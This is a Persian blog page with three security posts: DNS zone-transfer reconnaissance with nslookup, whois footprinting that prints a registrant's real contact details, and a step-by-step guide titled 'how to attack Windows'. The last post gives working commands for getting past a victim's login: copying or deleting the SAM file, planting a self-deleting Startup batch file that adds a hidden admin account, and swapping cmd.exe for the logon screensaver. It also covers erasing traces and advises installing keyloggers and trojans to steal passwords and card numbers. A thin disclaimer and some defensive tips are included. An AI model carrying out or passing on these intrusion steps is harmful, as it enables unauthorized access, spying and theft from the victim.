مهندسی پزشکی

مقالات مهندسی پزشکی

مهندسی پزشکی

مقالات مهندسی پزشکی

۶۳ مطلب با موضوع «امنیت وشبکه» ثبت شده است

بسم الله الرحمن الرحیم وقتی که DNS Server یک سایت را به‌دست آورده باشیم (از طریق whois )، به کمک دستور nslookup می‌توان اطلاعاتی اضافی در مورد آن سایت پیدا کرد. طریقه استفاده این دستور به صورت زیر است: فرض کنید که من می‌خواهم از Domain Server سایت خودم (far30.com) اطلاعاتی به‌دست بیارم. اگر به این سایت whois کنم، می‌بینم که دوتا Name Server یا DNS Server دارد: s1.sazin.com s2.sazin.com حالا دیگر آدرس DNS Server مربوط به far30.com را دارم و می‌توانم شروع کنم: ۱- دستور nslookup را در command prompt نوشته و اجرا می‌کنم:   C:\\>nslookup و نتایج را می‌بینم: *** Can\'t find server name for address 192.168.20.3: Non-exi... *** Can\'t find server name for address 192.168.20.1: Non-exi... *** Default servers are not available Default Server: UnKnown Address: 192.168.20.3   > علامت > یعنی شما می‌توانید دستورات را تایپ کنید. ۲- در جلوی علامت server dns_server که به جای dns_server باید آدرس DNS Server سایت موردنظر را بنویسم. پس برای سایت far30.com می‌شود: > server s1.sazin.com و جواب می‌شنوم:   Default Server: s1.sazin.com Address: 63.148.227.63   اگر در این مرحله پیغام خطا می‌گیرید، باید دوباره این دستور را تایپ کنید و نیز می‌توانید از DNS Server دومی که در whois برای far30.com به‌دست آوردیم ، استفاده کنیم. ۳- دستور زیر را تایپ کنید: > set type=any ۴- حالا به کمک دستور زیر اطلاعات را به‌دست می‌آوریم: > ls -d site_name . که برای far30.com می‌شود: >ls -d far30.com. دقت کنید که بعد از اسم سایت یک نقطه (dot) گذاشته‌ام، شما هم بهتر است اینطوری بنویسید. نتایج زیر حاصل می‌شود:   [s1.sazin.com] far30.com. SOA s1.sazin.com admin.sazin.com. (2002070412 3600 600 86400 3600) far30.com. A 63.148.227.65 far30.com. NS s1.sazin.com far30.com. NS s2.sazin.com far30.com. MX 10 mail.far30.com far30.com. MX 15 far30.com ftp CNAME far30.com mail A 63.148.227.65 www CNAME far30.com far30.com. SOA s1.sazin.com admin.sazin.com. (2002070412 3600 600 86400 3600) >   بعدا در مورد کاربرد تک‌تک اینها صحبت خواهم کرد ولی بعضی از آنها همین‌طوری هم اطلاعات واضحی دارند. ۵- دستور exit را مقابل
موافقین ۰ مخالفین ۰ ۰۱ آبان ۸۸ ، ۱۵:۰۸
Shahram Ghasemi
بسم الله الرحمن الرحیم آدرس‌های ip به ۵ کلاس تقسیم‌بندی می‌شوند که A تا E نام‌ دارند ولی از این بین سه کلاس اول (یعنی C,B,A) کاربرد عملی دارند که آنها را شرح می‌دهیم: ۱- کلاس A: اگر ip را به‌صورت xxx.yyy.yyy.yyy در نظر بگیرید، این کلاس تمام ipهایی را شامل می‌شود که xxx بین ۱ تا ۱۲۶ است. این کلاس ویژه backbone های بزرگ اینترنتی است و در هنگام ثبت domain برای گرفتن ip از آنها استفاده می‌شود. بنابراین اکثر سایت‌ها چنین ipهایی دارند. این کلاس را 8/ هم می‌گویند. ۲- کلاس B: این کلاس تمام ipهایی را شامل می‌شود که xxx بین ۱۲۸ و ۱۹۱ است. این کلاس هم از جمله کلاس‌های پرکاربرد است. این کلاس را 16/ هم می‌گویند. ۳- کلاس C: این این کلاس تمام ipهای را شامل می‌شود که xxx بین ۱۹۲ و ۲۲۳ است. این کلاس معمولا به ISP هایی که خدمات dial-up ارائه می‌دهند، تعلق می‌گیرد (این جمله چندان مستند نیست.). بنابراین اگر به‌صورت dial-up به اینترنت متصل شوید، چنین ip می‌گیرید. این کلاس را 24/ هم می‌گویند. سوالی که پیش می‌آید این است که xxx چرا نه در کلاس A و نه در B، عدد ۱۲۷ را شامل نمی‌شود؟ جواب این‌ است که ۱۲۷ برای کامپیوتر خودمان رزرو شده است. مثلا 127.0.0.1 معمولا یعنی localhost یعنی خودمان. به‌دست آوردن ip خودتان بعد از اتصال به اینترنت برای این‌کار راههای متفاوتی وجود دارد: ۱- راحت‌ترین راه استفاده از دستور ipconfig است. من با تایپ کردن آن به نتایج زیر رسیدم: Windows 2000 IP Configuration PPP adapter neda: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 217.66.198.116 Subnet Mask . . . . . . . . . . . : 255.255.255.255 Default Gateway . . . . . . . . . : 217.66.198.116 که آدرس ip تان را می‌توانید در سطر Ip Address ببینید. (مسئله پروکسی را فعلا نادیده بگیرید) ۲- بعد از اتصال به اینترنت حداقل یک صفحه باز کنید و بعد دستور netstat -n را در command prompt تایپ کنید. من با تایپ این دستور به نتایج زیر رسیدم: Active Connections Proto Local Address Foreign Address State TCP 217.66.198.116:2469 64.58.76.177:80 ESTABLISHED TCP 217.66.198.116:2471 66.163.175.130:80 ESTABLISHED TCP 217.66.198.116:2473 212.73.194.143:80 ESTABLISHED TCP 217.66.198.116:2474 212.73.194.143:80 ESTABLISHED TCP 217.66.198.116:2476 212.73.194.136:80 SYN_SENT ستونی که زیر عبارت Local Address قرار دارد، ip من در آن اتصال است. بنابراین ip من در آن اتصال 217.66.198.116 بوده است. ادامه مبحث Footprinting برای سرورها قبلا بحث را با روش پیدا کردن ip سرورها (سایت‌ها) شروع کردیم. حالا کمی در مورد whois می‌آموزیم. لازم به ذکر است که هنوز درمورد FootPrinting کلاینت‌ها صحبتی نکرده و نمی‌کنم. Whois چیست؟ تعریف کلی برای whois نمی‌توان ارائه داد ولی فعلا منظور ما از Whois همان کسب اطلاعات در مورد یک سایت است. (کاری که امروز می‌خواهم انجام دهم کسب اطلاعات در مورد یک شماره ip و یا یک domain (مثلا irib.com ) خاص است. برای کسب این اطلاعات باید به اینترنت وصل شده و به‌طریقی به یک سری سایت‌های خاص که وظیفه ثبت domain , ... را دارند متصل شده و اطلاعات را از آنها درخواست کنم. این سایت‌های خاص database (بانک‌های اطلاعاتی) ویژه این وظایف را دارند. برای کسب این اطلاعات از سایت‌ها روش‌های زیر را می‌توان به‌کار برد: ۱- اگر از طریق سیستم عامل یونیکس یا لینوکس به اینترنت وصل شده‌اید، دستوری به اسم whois در آنها وجود دارد. و یا می‌توانید از نرم‌افزارهای خاصی که برای این سیستم‌عامل‌ها وجود دارد (مثل Xwhois ) استفاده کنید. ولی فعلا بحث روی ویندوز است و این دستور در ویندوز وجود ندارد. ۲- برای whois کردن در ویندوز نرم‌افزارهای زیادی وجود دارد (که به زودی نوشتن یک whois متوسط را در زبان C یاد خواهم داد.) از مشهورترین این نرم‌افزارها Netscan tools و SamSpade است. ولی از اینها هم فعلا صرف نظر می‌کنم تا شما بیشتر با جزئیات این‌ کار آشنا شوید. ۳- روشی که ما در این جلسه به کار می‌بریم، استفاده از سایت‌هایی است که این جستجو را برای ما انجام می‌دهند. بحث را شروع می‌کنم: datebase های whois در چه سایت‌هایی وجود دارد؟ تعداد زیادی از سایت‌ها این داده‌ها را دارند که مشهورترین‌ها عبارتند از: whois.internic.net (The InterNIC) whois.onlinenic.com (The OnLineNIC) whois.arin.net (American Registry for Internet Numbers) whois.ripe.net (European IP Address Allocations) whois.apnic.net (European IP Address Allocations) whois.nic.mil (US Military) whois.nic.gov (US Government) اولین سایت مشهورترین سایت ثبت domain برای org , net , com است. توجه کنید که امروزه سایت‌های مختلفی عمل ثبت domain را انجام می‌دهند و برای اینکه در مورد یک سایت خاص (که در واقع یک domain خاص دارد) اطلاعاتی کسب کنیم باید اطلاعات مربوطه را از آن سایتی بگیریم که ثبت domain را انجام داده است و چون این کار مشکلی است به جای استفاده از خود سایت‌های بالایی، از سایت‌هایی دیگر استفاده می‌کنیم که این کار را برای ما ساده‌تر می‌کنند (خود آن سایت‌ها در نهایت اطلاعاتشان را از سایت‌های اصلی می‌گیرند و فقط یک نقش واسط دارند... لازم به‌ذکر است که ایجاد چنین صفحات وبی زیاد هم مشکل نیست.). سایت مورد علاقه من برای کسب اطلاعات سایت زیر است: http://www.samspade.org/t/whois?a=xxxxxxxxx که بجای xxxxxxxxx آدرس سایت و یا ip آنرا می‌نویسیم و آدرس حاصله را در مرورگر خود می‌بینیم. مثلا اگر بخواهم در مورد سایت sazin.com اطلاعاتی به‌دست بیاورم، می‌نویسم: http://www.samspade.org/t/whois?a=sazin.com و اطلاعات زیر به دست می‌آید: sazin.com is registered with BULKREGISTER.COM, INC. - redirecting to whois.bulkregister.com whois -h whois.bulkregister.com sazin.com The data in Bulkregister.com\'s WHOIS .........................(deleted) SazinNetWork 2nd.Floor,Bldg#116,Mollasadra Ave. Tehran, TEH 14358 IR Domain Name: SAZIN.COM Administrative Contact: Mohammad Hajati mjhajati@hotmail.com Sazin Rasaneh Co. 4th.Floor,Bldg.339,Mirdamad Ave. Tehran, TEH 19696 IR Phone: +98 21 8787064 Fax: +98 21 8789841 Technical Contact: Mohammad Hajati mjhajati@hotmail.com Sazin Rasaneh Co. 4th.Floor,Bldg.339,Mirdamad Ave. Tehran, TEH 19696 IR Phone: +98 21 8787064 Fax: +98 21 8789841 Record updated on 2002-03-02 05:47:36 Record created on 1999-05-10 Record expires on 2007-05-10 Database last updated on 2002-09-15 08:58:02 EST Domain servers in listed order: DNS.SAZIN.COM 80.78.134.221 S1.SAZIN.COM 63.148.227.63 S2.SAZIN.COM 63.148.227.64   ملاحظه می‌کنید که اطلاعات زیادی در مورد این سایت را به این طریق می‌توان به‌دست آورد. اطلاعاتی درمورد آدرس ISP ، شخصی که به‌عنوان Admin کار ثبت را انجام داده است و ... البته باز هم نمی‌توان در مورد صحت و سقم آن اظهارنظر قطعی داشت. تعدادی از مهمترین اطلاعات را در قسمت DNS Servers یا Domain servers (که در این مثال در آخر قرار دارد) می‌بینید. بعدا در مورد این آدرس‌ها توضیح خواهم داد ولی فعلا می‌گم که به کمک همین چند آدرسی که در آخر به‌دست آوردیم به کمک دستوری به نام nslookup می‌توان اطلاعات با ارزش‌تری به‌دست آورد که به‌زودی یاد می‌گیرید.
موافقین ۰ مخالفین ۰ ۰۱ آبان ۸۸ ، ۱۵:۰۸
Shahram Ghasemi
HTML clipboard بسم الله الرحمن الرحیم  دوستان عزیز قبل از اینکه این مقالات را مطالعه کنید باید بگویم من این آموزش ها را به شما ها یاد می دهم که بتوانید با استفاده از آن از هک شدن سیستم خود جلوگیری کنید چون اگر بخواهید یک راننده خوب باشید باید بتوانیید با تمامی ماشین ها برانید پس اگر می خواهید هک نشوید باید راه های هک شدن را بدانید تا از آن جلوگیری کنید پس امیدوارم که از مطالب این سایت به درستی استفاده کنید وهرگونه استفاده نادرست از آن مسئولیتش برعهده خودتان می باشد.                                      چگونه به ویندوز حمله کنیم در این مقاله فرض می کنیم که فایل سیستم ویندوز NTFS است . برای این کار چند روش وجود دارد : روش اول : در جایی که از شما UserName , Password پرسیده می شود کلید های Alt+Ctrl+Del را دو مرتبه همزمان فشار دهید . در قسمت UserName کلمه Administrator را وارد کرده و جای کلمه عبور را خالی بگذارید و Enter بزنید تا وارد ویندوز شوید ...  این روش ساده است اما همیشه کارساز نیست اگر برای Administrator آن کلمه عبوری قرار داده شده باشد ؟!! به سراغ روش دوم میرویم : روش دوم : 1- ابتدا یک فلاپی Bootable می سازیم . 2- اغلب فایل سیستم ویندوز XP,2000 از نوع NTFS است و در محیط شبیه Dos که با فلاپی راه اندازی میشود شناخته نمی شود بنا براین ما برای این کار نیاز به برنامه هایی مثل NTFS4DOS ( دانلود : http://users.cjb.net/mojtaba/ntfs4dos.zip ) داریم.(این نوع برنامه ها امکان کار کردن با درایو هایی که فایل سیستم آنها Ntfs را در dos به ما می دهد.) 3-  خوب پس از انجام مراحل فوق فلاپی را در فلاپی درایو قرار داده و سیستم را با آن راه اندازی می کنیم . و بر نامه NTFS4DOS را اجرا می کنیم تا به اطلاعات درایو های NTFS دسترسی داشته باشیم . 4- درایوی که ویندوز در آن نصب است را پیدا می کنیم و به مسیر زیر رفته : %Windir%System32Config Example : c:windowssystem32config در این پوشه فایلی به نام * sam را در فلاپی کپی می کنیم. ( نکته : در ویندوز 2000 با پاک کردن این فایل دیگر کار تمام است و میتوان با Username: Administrator و بدون پسورد وارد شویم اما میتوان برای این که رد پایی باقی نماند از فایل Sam یک کپی داشته باشیم تا بعد از انجام کارمان در ویندوز با برگرداندن این فایل به جای قبلی آن رد پای خود را پاک کنیم و نام و پسورد کاربران به حالت قبل برگردد.) از این مرحله به بعد برای Windows Xp بیشتر توصیه میشود : 5- بعد از کپی فایل با برنامه هایی نظیر L0phtCrack ,John the Ripper آن را کرک می کنیم تا پسورد را به دست آورد .  روش سوم : در این روش چهار مرحله اول روش دوم را انجام میدهیم. 1- دستورات زیر را در Notepad می نویسیم و در فایلی با نام و پسوند test.bat ذخیره میکنیم : echo off@ net user administrator 123 /add net localgroup administrator administrators /add net user administrator 123 del test.bat echo on@ 2- بعد فایل مورد نظر را در فلاپی کپی کرده و به سراغ کامپیوتر قربانی می رویم و فایلی که در مرحله قبل ساخته ایم را در مسیر زیر کپی می کنیم(به فرض که ویندوز در درایو C نصب باشد و کاربری با نام hassan مدیر سیستم باشد): C:Documents and SettingshassanStart MenuProgramsStartup 3- خوب حالا فقط کافی است که منتظر بمانید تا کاربر hassan یک بار وارد شود دیگر تمام است و شما بعد از آن می توانید با نام کاربری Administrator و کلمه عبور 123 وارد سیستم شوید. توضیح دستورات مربوط به فایلی که میسازیم : در خط اول این دستور باعث مخفی شدن بقیه دستورات در حال اجرا از دید کاربر می شود. در خط دوم ما یک کاربر بانام Administrator و کلمه عبور 123 می سازیم .(این عمل برای این صورت می گیرد که ممکن است نام Administrator را تغییر داده باشند). در خط سوم کاربری را که در خط قبل ساخته ایم را به عنوان سرپرست (ادمین) سیستم قرار میدهیم. در خط چهارم احتمال می دهیم که نام Administrator را تغییر داده نشده باشد . پس ما فقط پسورد آن را عوض می کنیم. در خط پنجم برای از بین بردن رد پا فایلی را که ساخته ایم را پاک می کنیم. در خط ششم هم حالتی را که دستور خط اول ایجاد کرده بود به حالت اول بر می گردانیم. نکته : توجه کنید که به جای کاربر Administrator و کلمه عبور 123 هر کاربر یا کلمه عبور دیگری می توانید قرار دهید اما این کاربر کمتر باعث شک می شود . روش چهارم : استفاده از برنامه Windows XP / 2000 / NT Key است . نسخه آزمایشی این برنامه را می توانید دانلود کنید. روش پنجم  تا مرحله 4 را انجام می دهیم حالا در Dos هستیم و دستورات را جلوی خط فرمان می نویسیم . الف - ابتدا به درایوی می رویم که در آن ویندوز نصب شده است .برای مثال فرض کنیم در درایو C نصب باشد دستور زیر را اجرا می کنیم : :c ب - Windows/System32 میرویم .و در آنجا کارهای زیر را انجام می دهیم : با دستور : cd windows/system32 پ - یک پوشه ایجاد می کنیم با دستور زیر : md hack ت - حالا دو فایل cmd.exe و logon.scr را به این پوشه کپی می کنیم تا یک نسخه پشتیبان از این فایل ها داشته باشیم با اجرای دستورات زیر : copy cmd.exe hack copy logon.scr hack ث - حالا فایل logon.scr را پاک می کنیم : del logon.scr ج - حالا فایل cmd.exe را به logon.scr تغییر نام می دهیم : ren cmd.exe logon.scr حالا کافی است کامپیوتر را ریستارت کنید . بعد از این که ویندوز بالا آمد ، اگر توجه کنید چند دقیقه که صبر کنید در حالت عادی Screen saver Logon.scr به اجرا در می آید اما با این دستکاری که ما کرده ایم Cmd.exe به اجرا در می آید حالا می توانید کاربر جدید ایجاد کنید و یا کلمه عبور را عوض کنید . برای ایجاد حساب کاربری از دستور زیر استفاده می کنیم : net user hassan 123 /add این دستور یک حساب کاربری با نام hassan و کلمه عبور 123 ایجاد می کند. برای این که این کاربر را مدیر(Administrator) قرار دهیم دستور زیر را انجام می دهیم : net localgroup hassan administrators /add حالا اگر یک حساب کاربری موجود باشد و بخواهیم پسورد اون رو عوض کنیم دستور زیر را انجام می دهیم : net user Ali 123 این دستور بدون این که پسورد قبلی کاربر Ali را از ما بخواهد پسورد اون رو به 123 تغییر می دهد. ضمنا بعد از ورود به سیستم فایل هایی که در پوشه hack کپی کرده ایم را به جای قبلی برگردانید و پوشه hack را پاک کنید تا ردی باقی نماند . نتیجه : حالا که به عنوان مدیر وارد سیستم شدیم چه کارهایی می توانیم انجام دهیم . اول این که می توانید به اطلاعات سیستم دسترسی پیدا کرده و ... دوم این که یک برنامه جاسوسی مثل XpSpy ها ویا Key Logger ها نصب کنید تا تمامی پسورد های ایمیل ها و کارتهای اعتباری و ... و وب سایت های که سر می زند و حتی کلماتی که چت می کند و ... را بدانید . سوم این که میتوانید یک تروجان روی کامپیوتر قربانی نصب کنید و بقیه اش رو خودتون میدونین ... چهارم این که می توانید کامپیوتر او را طوری پیکر بندی کنید که به شما اجازه ریموت کردن را بدهد و با یک تروجان آی پی اون رو به دست آورید و اون را کنترل کنید . توصیه های مهم : 1- از دسترسی افراد نامطمئن به سیستم خود جلوگیری کنید . 2- حداقل کاری که میتونین انجام بدین این است که سیستم شما با CDو یا Floppy بوت نشود و Bios خود را با کلمه رمز محافظت نمایید. 3- همیشه از کلمات عبور پیچیده که مخلوتی از حرف و عدد و علائم ویژه باشد استفاده کنید . مثلا کلمه عبور X@#%Übps خیلی بهتر از کلمه عبور spssstudioworks است . این کار حداقل کرک کردن پسورد شما را طولانی میکند. 4- LM Hash را غیر فعال کنید . برای این منظور به کنترل پانل رفته و Local Security Policy را از Administrative Tools را اجرا کرده و به پوشه Security Option از پوشه Local Policies رفته و در آنجا Network Security : Do not Store LAN Manager hash value on next password change را Enable کنید سپس پسورد ادمین را عوض کنید. 5- نام کاربری Administrator وGuest را حتما تغییر دهید و برای آنها کلمه عبور قرار دهید . 6- اگر به کاربر Guest نیازی ندارید آن را غیر فعال کنید . 7- هر چند وقت یکبار پسورد خود را عوض کنید. 8- کاربران خود را هر چند وقت یکبار چک کنید تا از موارد مشکوک مطلع شوید.
موافقین ۰ مخالفین ۰ ۰۱ آبان ۸۸ ، ۱۴:۱۶
Shahram Ghasemi